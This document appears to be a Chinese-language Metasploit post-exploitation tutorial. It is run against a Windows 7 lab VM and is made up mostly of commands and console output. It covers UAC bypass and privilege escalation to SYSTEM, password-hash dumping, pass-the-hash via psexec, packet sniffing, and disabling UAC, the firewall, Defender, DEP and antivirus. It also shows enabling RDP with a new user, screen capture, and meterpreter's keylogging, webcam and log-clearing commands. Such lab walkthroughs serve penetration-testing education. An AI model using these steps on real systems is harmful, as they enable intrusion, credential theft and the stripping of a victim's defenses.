信息收集
获取目标机器的分区情况: post/windwos/gather/forensics/enum_drives
判断是否为虚拟机 post/windows/gather/checkvm
开启了哪些服务 :post/windwos/gather/enum_services
安装了哪些应用: post/windows/gather/enum_applications
查看共享: post/windows/gather/enum_shares
获取主机最近的系统操作: post/windows/gather/dumplinks
查看安装补丁: post/windows/gather/enum_patches
scraper脚本
winenum脚本
好 开始操作
run post/ 按tab
meterpreter > run post/
Display all 229 possibilities? (y or n)
有229个模块可以利用
进行收集windows模块
meterpreter > run post/windows/gather/
Display all 119 possibilities? (y or n)
gather是收集的意思
forensics 取证
meterpreter > run post/windows/gather/forensics/
run post/windows/gather/forensics/browser_history run post/windows/gather/forensics/enum_drives run post/windows/gather/forensics/nbd_server
run post/windows/gather/forensics/duqu_check run post/windows/gather/forensics/imager run post/windows/gather/forensics/recovery_files
获取分区:
meterpreter > run post/windows/gather/forensics/enum_drives
Device Name: Type: Size (bytes):
------------ ----- -------------
<Physical Drives:>
\\.\PhysicalDrive0 4702111234474983745
<Logical Drives:>
\\.\C: 4702111234474983745
\\.\D: 4702111234474983745
判断是否为虚拟机:
meterpreter > run post/windows/gather/checkvm
[*] Checking if WORK-PC is a Virtual Machine ...
[+] This is a VMware Virtual Machine
查看安装补丁:
meterpreter > run post/windows/gather/enum_patches
[*] Patch list saved to /root/.msf4/loot/20201117105913_default_192.168.86.145_enum_patches_545017.txt
[*] KB2534111 applied
[*] KB976902 applied
脚本应用
查看系统基本信息:
meterpreter > run scraper
[*] New session on 192.168.86.145:49179...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*] Exporting HKCU
[*] Downloading HKCU (C:\Users\ADMINI~1\AppData\Local\Temp\znstUAlF.reg)
[*] Cleaning HKCU
[*] Exporting HKLM
[*] Downloading HKLM (C:\Users\ADMINI~1\AppData\Local\Temp\fdJwVUXN.reg)
[*] Cleaning HKLM
[*] Exporting HKCC
[*] Downloading HKCC (C:\Users\ADMINI~1\AppData\Local\Temp\rqIgihkj.reg)
[*] Cleaning HKCC
[*] Exporting HKCR
[*] Downloading HKCR (C:\Users\ADMINI~1\AppData\Local\Temp\RYnqTrun.reg)
[*] Cleaning HKCR
[*] Exporting HKU
[*] Downloading HKU (C:\Users\ADMINI~1\AppData\Local\Temp\TTxYTdlF.reg)
[*] Cleaning HKU
[*] Completed processing on 192.168.86.145:49179...
去导出的目录下 查看就可以了
搜索相关信息:
run winenum
权限提升
-
提高程序运行级别
-
UAC绕过
-
利用提权漏洞进行提权
UAC就是应用弹出的那个是 / 否 的框框
提高程序运行级别
以高权限的方式重启一个反弹shellcode 并没有完全绕过用户权限 并且会触发UAC
要点是–>msf模块: exploit/windows/local/ask
查看用户权限:getuid
进行提权:getsystem
会报错因为你的权限不够
退出meterpreter:background
回到监听模块
此时session还在的
之后加载msf模块: use exploit/windows/local/ask
设置payload:
set payload windows/x64/meterpreter/reverse_tcp
查看信息: info
msf5 exploit(windows/local/ask) > info
Name: Windows Escalate UAC Execute RunAs
Module: exploit/windows/local/ask
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2012-01-03
Provided by:
mubix <mubix@hak5.org>
b00stfr3ak
Available targets:
Id Name
-- ----
0 Windows
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME no File name on disk
PATH no Location on disk, %TEMP% used if not set
SESSION yes The session to run this module on.
TECHNIQUE EXE yes Technique to use (Accepted: PSH, EXE)
Payload information:
Description:
This module will attempt to elevate execution level using the
ShellExecute undocumented RunAs flag to bypass low UAC settings.
设置sessions:set session 1
FILINAME :行为框弹出来的名字:
set filename QQ.exe
msf5 exploit(windows/local/ask) > exploit
[*] Started reverse TCP handler on 192.168.86.136:4444
[*] UAC is Enabled, checking level...
[*] The user will be prompted, wait for them to click 'Ok'
[*] Uploading QQ.exe - 7168 bytes to the filesystem...
[*] Executing Command!
[*] Sending stage (201283 bytes) to 192.168.86.145
[*] Meterpreter session 3 opened (192.168.86.136:4444 -> 192.168.86.145:49195) at 2020-11-17 16:22:28 +0800
攻击之后,win7就会弹出一个框,点击ok就可以进行 getsystem提权了
msf5 exploit(windows/local/ask) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows WORK-PC\Administrator @ WORK-PC 192.168.86.136:4444 -> 192.168.86.145:49194 (192.168.86.145)
2 meterpreter x64/windows WORK-PC\Administrator @ WORK-PC 192.168.86.136:4444 -> 192.168.86.145:49193 (192.168.86.145)
3 meterpreter x64/windows WORK-PC\Administrator @ WORK-PC 192.168.86.136:4444 -> 192.168.86.145:49195 (192.168.86.145)
多出来一个高权限的sessions 3
msf5 exploit(windows/local/ask) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > getuid
Server username: WORK-PC\Administrator
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
可以看到已经是system权限了
默认UAC设置的级别是默认,所以不会弹窗。
(win+R打开–>msconfig–>工具–>更改UAC设置)
修改为高即会弹窗
- UAC绕过
back返回
msf5 > use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_comhijack
use exploit/windows/local/bypassuac_dotnet_profiler
use exploit/windows/local/bypassuac_eventvwr
use exploit/windows/local/bypassuac_fodhelper
use exploit/windows/local/bypassuac_injection
use exploit/windows/local/bypassuac_injection_winsxs
use exploit/windows/local/bypassuac_sdclt
use exploit/windows/local/bypassuac_silentcleanup
use exploit/windows/local/bypassuac_sluihijack
use exploit/windows/local/bypassuac_vbs
use exploit/windows/local/bypassuac_windows_store_filesys
use exploit/windows/local/bypassuac_windows_store_reg
有这么多的模块
exploit/windows/local/bypassuac
exploit/windows/local/bypassuac_injection
exploit/windows/local/bypassuac_vbs
使用模块,设置sessions信息之后,exploit,会获取到新的会话,可直接提权
meterpreter > getuid
Server username: admin-PC\admin
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
- 利用提权漏洞进行提权
ms14_058、 ms16_032、 ms15_051 、 ms16_016
msf模块
use exploit/windows/local/ms14_058_track_popup_menu
这里直接进去就是system权限
数据包捕获
抓包:
加载 sniffer : load sniffer
查看网卡信息 : sniffer_interface
开启监听 : sniffer_start1
导出数据包 : sniffer_dump 1.1cap
解包:
auxiliary/sniffer/psnuffle
抓包演练
msf5 exploit(multi/handler) > sessions -i 3
[*] Starting interaction with 3...
meterpreter > load sniffer
Loading extension sniffer...Success.
meterpreter > sniffer_interface
[-] Unknown command: sniffer_interface.
meterpreter > sniffer_interfaces
1 - 'WAN Miniport (Network Monitor)' ( type:3 mtu:1514 usable:true dhcp:false wifi:false )
2 - 'Intel(R) PRO/1000 MT Network Connection' ( type:0 mtu:1514 usable:true dhcp:true wifi:false )
meterpreter > sniffer_start 2
[*] Capture started on interface 2 (50000 packet buffer)
meterpreter > sniffer_dump 2 2.cap
[*] Flushing packet capture buffer for interface 2...
[*] Flushed 10 packets (1679 bytes)
[*] Downloaded 100% (1679/1679)...
[*] Download completed, converting to PCAP...
[*] PCAP file written to 2.cap
用wireshark打开
解包演练
msf5 auxiliary(sniffer/psnuffle) > set PCAPFILE /root/msf/2.cap
PCAPFILE => /root/msf/2.cap
msf5 auxiliary(sniffer/psnuffle) > exploit
PassingTheHash
windwos 系统下的hashh密码格式为:
用户名:RID:LM-HASH值:NT-HASH值
获取hash值:
hashdump (需要系统权限)
run post/windwos/gather/smart_hashdump
检查权限和系统类型
检查是否是域控服务器
从注册表中读取hash、注入LSASS进程
如果是08server并且具有管理员权限,直接getsystem提权
如果是win7且UAC关闭并具有管理员权限,从注册表中读取
03/XP直接getsystem,从注册表获取HASH
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
也可以用后渗透的这个脚本
meterpreter > run post/windows/gather/hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 052e64cbfb72fedce5ea362fea048f3a...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
No users with password hints on this system
[*] Dumping password hashes...
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
meterpreter > run post/windows/gather/smart_hashdump
[*] Running module against WORK-PC
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20201119162703_default_192.168.86.147_windows.hashes_043948.txt
[*] Dumping password hashes...
[-] On this version of Windows you need to be NT AUTHORITY\SYSTEM to dump the hashes
[-] Try setting GETSYSTEM to true.
meterpreter >
已经有权限了 破解密码 为啥?
因为减少被发现的可能性
可以尝试进行弱口令尝试
hash值破解:
离线 findmyhash(kali的工具) 、 L0phtCrack
hash传递: 用hash值进行登录
psexec: exploit/windows/smb/psexec
msf5 exploit(multi/handler) > use exploit/windows/smb/psexec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.86.136 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.86.147
RHOSTS => 192.168.86.147
msf5 exploit(windows/smb/psexec) >
去查看445端口有没有开启
root@localhost:~# netstat -ano
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State Timer
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 0.0.0.0:8000 0.0.0.0:* LISTEN off (0.00/0/0)
tcp 0 0 192.168.86.136:4444 192.168.86.147:49203 ESTABLISHED off (0.00/0/0)
tcp 0 0 192.168.86.136:4444 192.168.86.147:49202 ESTABLISHED off (0.00/0/0)
tcp 0 0 192.168.86.136:4444 192.168.86.147:49200 ESTABLISHED off (0.00/0/0)
tcp 0 0 192.168.86.136:4444 192.168.86.147:49204 ESTABLISHED off (0.00/0/0)
tcp 0 0 192.168.86.136:4444 192.168.86.147:49201 ESTABLISHED off (0.00/0/0)
tcp6 0 0 :::111 :::* LISTEN off (0.00/0/0)
udp 0 0 0.0.0.0:111 0.0.0.0:* off (0.00/0/0)
udp 0 0 192.168.86.136:68 192.168.86.254:67 ESTABLISHED off (0.00/0/0)
udp6 0 0 :::111 :::* off (0.00/0/0)
raw6 0 0 :::58 :::* 7 off (0.00/0/0)
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 23555 /run/user/132/bus
unix 2 [ ACC ] STREAM LISTENING 28842 @/tmp/.ICE-unix/1099
unix 2 [ ACC ] STREAM LISTENING 23557 /run/user/132/gnupg/S.dirmngr
unix 2 [ ACC ] STREAM LISTENING 23560 /run/user/132/gnupg/S.gpg-agent.browser
unix 2 [ ACC ] STREAM LISTENING 23562 /run/user/132/gnupg/S.gpg-agent.extra
unix 2 [ ACC ] STREAM LISTENING 28940 /run/user/0/keyring/ssh
unix 2 [ ACC ] STREAM LISTENING 23564 /run/user/132/gnupg/S.gpg-agent.ssh
unix 2 [ ACC ] STREAM LISTENING 23566 /run/user/132/gnupg/S.gpg-agent
unix 2 [ ACC ] STREAM LISTENING 23568 /run/user/132/pk-debconf-socket
unix 2 [ ACC ] STREAM LISTENING 23570 /run/user/132/pulse/native
unix 2 [ ] DGRAM 15634 /run/systemd/journal/syslog
unix 2 [ ACC ] STREAM LISTENING 15638 /run/systemd/fsck.progress
unix 2 [ ACC ] STREAM LISTENING 28954 /run/user/0/keyring/pkcs11
unix 16 [ ] DGRAM 15646 /run/systemd/journal/dev-log
unix 2 [ ACC ] STREAM LISTENING 23679 @/tmp/.X11-unix/X0
unix 2 [ ACC ] STREAM LISTENING 15650 /run/systemd/journal/stdout
unix 2 [ ACC ] STREAM LISTENING 28334 @/tmp/.X11-unix/X1
unix 8 [ ] DGRAM 15653 /run/systemd/journal/socket
unix 2 [ ACC ] SEQPACKET LISTENING 15656 /run/udev/control
unix 2 [ ACC ] STREAM LISTENING 28203 /run/user/0/keyring/control
unix 2 [ ACC ] STREAM LISTENING 18475 /run/systemd/journal/io.systemd.journal
unix 2 [ ] DGRAM 27954 /run/user/0/systemd/notify
unix 2 [ ACC ] STREAM LISTENING 31155 @/dbus-vfs-daemon/socket-Mqageqvy
unix 2 [ ACC ] STREAM LISTENING 27958 /run/user/0/systemd/private
unix 2 [ ACC ] STREAM LISTENING 27965 /run/user/0/bus
unix 2 [ ACC ] STREAM LISTENING 27967 /run/user/0/gnupg/S.dirmngr
unix 2 [ ACC ] STREAM LISTENING 27970 /run/user/0/gnupg/S.gpg-agent.browse
如何开启呢?
- 一、首先需要安装ufw命令
# apt-get install ufw
- 二、ufw命令使用实例如下:
检查防火墙的状态(默认 inactive) # ufw status
防火墙版本 # ufw version
启动ufw防火墙 # ufw enable
关闭ufw防火墙 # ufw disable
默认禁止访问所有 # ufw default deny
开放22/TCP端口 # ufw allow 22/tcp
开放53端口(tcp/udp) # ufw allow 53
禁止外部访问 # ufw deny 3306
删除已经添加过的规则 # ufw delete allow 22
允许此IP访问所有的本机端口 # ufw allow from 192.168.1.100
删除上面的规则 # ufw delete allow from 192.168.1.100
查看规则,显示行号 # ufw status numbered
删除第三条规则 # ufw delete 3
关闭ufw # ufw disable
禁止对8888端口的访问 # ufw deny 8888
打开来自192.168.0.1的tcp请求的22端口 # ufw allow proto tcp from 192.168.0.1 to any port 22
root@localhost:~# ufw allow 445
Rules updated
Rules updated (v6)
然后继续
msf5 exploit(windows/smb/psexec) > set SMBPass aad3b435b51404eeaad3b435b51404ee
SMBPass => aad3b435b51404eeaad3b435b51404ee
msf5 exploit(windows/smb/psexec) > set SMBUSER Administrator
SMBUSER => Administrator
msf5 exploit(windows/smb/psexec) > set payload
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/psexec) > show options
Module options (exploit/windows/smb/psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.86.147 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 445 yes The SMB service port (TCP)
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass aad3b435b51404eeaad3b435b51404ee no The password for the specified username
SMBUser Administrator no The username to authenticate as
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.86.136 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf5 exploit(windows/smb/psexec) >
win7注册表关闭UAC:
首先按下键盘“Win + R”打“运行”窗口,然后输入“regedit”并点击确定打开注册表
进入“注册表编辑器”窗口后,在左侧依次展开“HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Policies/System”;
然后在右侧分别找到“ConsentPromptBehaviorAdmin”、“EnableLUA”、“PromptOnSecureDesktop”3个项,在其位置处右键打开菜单,然后选择“修改”,把“数值数据”修改为“0”,点击确定即可
获取到shell进行修改也可以
进入system32目录下
C:\Windows\system32>reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
reg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /freg.exe ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
The operation completed successfully.
C:\Windows\system32>
如果是乱码 先执行:chcp 65001 即可解决
查看add语法
C:\Windows\system32>reg add /?
reg add /?
REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f]
KeyName [\\Machine\]FullKey
Machine Name of remote machine - omitting defaults to the
current machine. Only HKLM and HKU are available on remote
machines.
FullKey ROOTKEY\SubKey
ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ]
SubKey The full name of a registry key under the selected ROOTKEY.
/v The value name, under the selected Key, to add.
/ve adds an empty value name (Default) for the key.
/t RegKey data types
[ REG_SZ | REG_MULTI_SZ | REG_EXPAND_SZ |
REG_DWORD | REG_QWORD | REG_BINARY | REG_NONE ]
If omitted, REG_SZ is assumed.
/s Specify one character that you use as the separator in your data
string for REG_MULTI_SZ. If omitted, use "\0" as the separator.
/d The data to assign to the registry ValueName being added.
/f Force overwriting the existing registry entry without prompt.
Examples:
REG ADD \\ABC\HKLM\Software\MyCo
Adds a key HKLM\Software\MyCo on remote machine ABC
REG ADD HKLM\Software\MyCo /v Data /t REG_BINARY /d fe340ead
Adds a value (name: Data, type: REG_BINARY, data: fe340ead)
REG ADD HKLM\Software\MyCo /v MRU /t REG_MULTI_SZ /d fax\0mail
Adds a value (name: MRU, type: REG_MULTI_SZ, data: fax\0mail\0\0)
REG ADD HKLM\Software\MyCo /v Path /t REG_EXPAND_SZ /d ^%systemroot^%
Adds a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%)
Notice: Use the caret symbol ( ^ ) inside the expand string
C:\Windows\system32>
/v 你要修改什么
/t 所选的数据类型
/d 要分配给添加的注册表ValueName的数据
/f 不用提示就强行覆盖现有的注册表项
既然提示成功了 就去查看一下
很好 很nice
有一个辅助模块 对弱口令 进行猜解
auxiliary/analyze/jtr_crak_fast
关闭杀毒软件和防火墙
需要进入windows-->关闭防火墙
netsh advfirewall set allprofiles state off (管理员及以上权限)
需要进入windows-->关闭 Denfender (windows 自带服务)
net stop windefend(这里要看服务名称)
需要进入windows->关闭DEP (数据执行保护-->windows 安全机制)
bcdedit.exe /set {current} nx AlwaysOff
meterpreter模块-->关闭杀毒软件
run killav
run post/windows/manage/killava
开始操作
关闭防火墙
确认win7的防火墙是打开的
进入shell
C:\Windows\system32>netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state off
Ok.
C:\Windows\system32>
关闭完成
查看服务是否开启
services.msc
C:\Windows\system32>net stop windefend
net stop windefend
The service name is invalid.
More help is available by typing NET HELPMSG 2185.
因为靶机上没有这个服务。。
关闭DEP
C:\Windows\system32>bcdedit.exe /set {current} nx AlwaysOff
bcdedit.exe /set {current} nx AlwaysOff
The operation completed successfully.
C:\Windows\system32>
关闭杀毒软件
meterpreter > run post/windows/manage/killava
[-] The specified meterpreter session script could not be found: post/windows/manage/killava
meterpreter >
因为靶机上没有杀毒软件…
开启远程桌面
run post/windows/manage/enable_rdp
(清楚痕迹: run multi_console_command -h 、 run multi_console_command -r /root/.msf4/loot/20200921222458_default_192.168.2.143_host.windows.cle_083768.txt)
run getgui -e (run getgui -h)
开启远程桌面并添加一个新用户 :
run getgui -u bean -p ean
开启远程桌面并绑定在 8888 端口:
run getgui -e -f 8888
查看靶机是否开启远程桌面
看他有没有开启3389远程桌面端口
这里也可以看到他是没有开启的
执行 run post/windows/manage/enable_rdp
可以看到已经开启了
关闭远程桌面run multi_console_command -h 查看帮助命令
关闭远程桌面run multi_console_command -r /root/.msf4/loot/20201124090617_default_192.168.86.156_host.windows.cle_641376.txt
meterpreter > run post/windows/manage/enable_rdp
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup execute Meterpreter resource file: /root/.msf4/loot/20201124090617_default_192.168.86.156_host.windows.cle_641376.txt
meterpreter > run multi_console_command -h
Console Multi Command Execution Meterpreter Script
OPTIONS:
-c <opt> Commands to execute. The command must be enclosed in double quotes and separated by a comma.
-h Help menu.
-r <opt> Text file with list of commands, one per line.
-s Hide commands output for work in background sessions
meterpreter > run multi_console_command -r /root/.msf4/loot/20201124090617_default_192.168.86.156_host.windows.cle_641376.txt
[*] Running Command List ...
[*] Running command execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
Process 3584 created.
另一种方式:run getgui
meterpreter > run getgui -h
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
Windows Remote Desktop Enabler Meterpreter Script
Usage: getgui -u <username> -p <password>
Or: getgui -e
OPTIONS:
-e Enable RDP only.
-f <opt> Forward RDP Connection.
-h Help menu.
-p <opt> The Password of the user to add.
-u <opt> The Username of the user to add.
meterpreter > run getgui -e
[!] Meterpreter scripts are deprecated. Try post/windows/manage/enable_rdp.
[!] Example: run post/windows/manage/enable_rdp OPTION=value [...]
[*] Windows Remote Desktop Configuration Meterpreter Script by Darkoperator
[*] Carlos Perez carlos_perez@darkoperator.com
[*] Enabling Remote Desktop
[*] RDP is already enabled
[*] Setting Terminal Services service startup mode
[*] Terminal Services service is already set to auto
[*] Opening port in local firewall if necessary
[*] For cleanup use command: run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20201124.1449.rc
meterpreter > run multi_console_command -r /root/.msf4/logs/scripts/getgui/clean_up__20201124.1449.rc
[*] Running Command List ...
[*] Running command execute -H -f cmd.exe -a "/c 'netsh firewall set service type = remotedesktop mode = enable'"
Process 1804 created.
meterpreter >
开启远程桌面并添加一个新用户 :run getgui -u bean -p ean
开启远程桌面并绑定在 8888 端口:run getgui -e -f 8888
linux 远程连接windows命令
rdesktop
root@localhost:~# rdesktop -h
rdesktop: A Remote Desktop Protocol client.
Version 1.8.6. Copyright (C) 1999-2011 Matthew Chapman et al.
See http://www.rdesktop.org/ for more information.
Usage: rdesktop [options] server[:port]
-u: user name
-d: domain
-s: shell / seamless application to start remotly
-c: working directory
-p: password (- to prompt)
-n: client hostname
-k: keyboard layout on server (en-us, de, sv, etc.)
-g: desktop geometry (WxH)
-i: enables smartcard authentication, password is used as pin
-f: full-screen mode
-b: force bitmap updates
-L: local codepage
-A: path to SeamlessRDP shell, this enables SeamlessRDP mode
-B: use BackingStore of X-server (if available)
-e: disable encryption (French TS)
-E: disable encryption from client to server
-m: do not send motion events
-C: use private colour map
-D: hide window manager decorations
-K: keep window manager key bindings
-S: caption button size (single application mode)
-T: window title
-t: disable use of remote ctrl
-N: enable numlock syncronization
-X: embed into another window with a given id.
-a: connection colour depth
-z: enable rdp compression
-x: RDP5 experience (m[odem 28.8], b[roadband], l[an] or hex nr.)
-P: use persistent bitmap caching
-r: enable specified device redirection (this flag can be repeated)
'-r comport:COM1=/dev/ttyS0': enable serial redirection of /dev/ttyS0 to COM1
or COM1=/dev/ttyS0,COM2=/dev/ttyS1
'-r disk:floppy=/mnt/floppy': enable redirection of /mnt/floppy to 'floppy' share
or 'floppy=/mnt/floppy,cdrom=/mnt/cdrom'
'-r clientname=<client name>': Set the client name displayed
for redirected disks
'-r lptport:LPT1=/dev/lp0': enable parallel redirection of /dev/lp0 to LPT1
or LPT1=/dev/lp0,LPT2=/dev/lp1
'-r printer:mydeskjet': enable printer redirection
or mydeskjet="HP LaserJet IIIP" to enter server driver as well
'-r sound:[local[:driver[:device]]|off|remote]': enable sound redirection
remote would leave sound on server
available drivers for 'local':
alsa: ALSA output driver, default device: default
'-r clipboard:[off|PRIMARYCLIPBOARD|CLIPBOARD]': enable clipboard
redirection.
'PRIMARYCLIPBOARD' looks at both PRIMARY and CLIPBOARD
when sending data to server.
'CLIPBOARD' looks at only CLIPBOARD.
'-r scard[:"Scard Name"="Alias Name[;Vendor Name]"[,...]]
example: -r scard:"eToken PRO 00 00"="AKS ifdh 0"
"eToken PRO 00 00" -> Device in Linux/Unix enviroment
"AKS ifdh 0" -> Device shown in Windows enviroment
example: -r scard:"eToken PRO 00 00"="AKS ifdh 0;AKS"
"eToken PRO 00 00" -> Device in Linux/Unix enviroment
"AKS ifdh 0" -> Device shown in Windows enviroment
"AKS" -> Device vendor name
-0: attach to console
-4: use RDP version 4
-5: use RDP version 5 (default)
-o: name=value: Adds an additional option to rdesktop.
sc-csp-name Specifies the Crypto Service Provider name which
is used to authenticate the user by smartcard
sc-container-name Specifies the container name, this is usally the username
sc-reader-name Smartcard reader name to use
sc-card-name Specifies the card name of the smartcard to use
root@localhost:~#
-u 它的用户名
-p 它的密码
后面在加上它的ip
当你没有权限开启它的远程桌面时
load espia(加载插件)
screengrab
可以尝试这两个命令 进行对它桌面的截图
meterpreter > screengrab
Screenshot saved to: /root/CMkdxkkF.jpeg
使用打开图片的命令
eog /root/CMkdxkkF.jpeg
尝试插件截图
meterpreter > load espia
Loading extension espia...Success.
meterpreter > ?
Core Commands
=============
Command Description
------- -----------
? Help menu
background Backgrounds the current session
bg Alias for background
bgkill Kills a background meterpreter script
bglist Lists running background scripts
bgrun Executes a meterpreter script as a background thread
channel Displays information or control active channels
close Closes a channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the meterpreter session
get_timeouts Get the current session timeout values
guid Get the session GUID
help Help menu
info Displays information about a Post module
irb Open an interactive Ruby shell on the current session
load Load one or more meterpreter extensions
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the server to another process
pivot Manage pivot listeners
pry Open the Pry debugger on the current session
quit Terminate the meterpreter session
read Reads data from a channel
resource Run the commands stored in a file
run Executes a meterpreter script or Post module
secure (Re)Negotiate TLV packet encryption on the session
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish session.
transport Change the current transport mechanism
use Deprecated alias for "load"
uuid Get the UUID for the current session
write Writes data to a channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file to the screen
cd Change directory
checksum Retrieve the checksum of a file
cp Copy source to destination
dir List files (alias for ls)
download Download a file or directory
edit Edit a file
getlwd Print local working directory
getwd Print working directory
lcd Change local working directory
lls List local files
lpwd Print local working directory
ls List files
mkdir Make directory
mv Move source to destination
pwd Print working directory
rm Delete the specified file
rmdir Remove directory
search Search for files
show_mount List all mount points/logical drives
upload Upload a file or directory
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display interfaces
ipconfig Display interfaces
netstat Display the network connections
portfwd Forward a local port to a remote service
resolve Resolve a set of host names on the target
route View and modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get one or more environment variable values
getpid Get the current process identifier
getprivs Attempt to enable all privileges available to the current process
getsid Get the SID of the user that the server is running as
getuid Get the user that the server is running as
kill Terminate a process
localtime Displays the target system's local date and time
pgrep Filter processes by name
pkill Terminate processes by name
ps List running processes
reboot Reboots the remote computer
reg Modify and interact with the remote registry
rev2self Calls RevertToSelf() on the remote machine
shell Drop into a system command shell
shutdown Shuts down the remote computer
steal_token Attempts to steal an impersonation token from the target process
suspend Suspends or resumes a list of processes
sysinfo Gets information about the remote system, such as OS
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all accessible desktops and window stations
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyboard_send Send keystrokes
keyevent Send key events
keyscan_dump Dump the keystroke buffer
keyscan_start Start capturing keystrokes
keyscan_stop Stop capturing keystrokes
mouse Send mouse events
screenshare Watch the remote user's desktop in real time
screenshot Grab a screenshot of the interactive desktop
setdesktop Change the meterpreters current desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play a waveform audio file (.wav) on the target system
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate your privilege to that of local system.
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
Espia Commands
==============
Command Description
------- -----------
screengrab Attempt to grab screen shot from process's active desktop
meterpreter > screengrab
Screenshot saved to: /root/swNERpKa.jpeg
同样进行打开截图
eog /root/swNERpKa.jpeg
令牌假冒
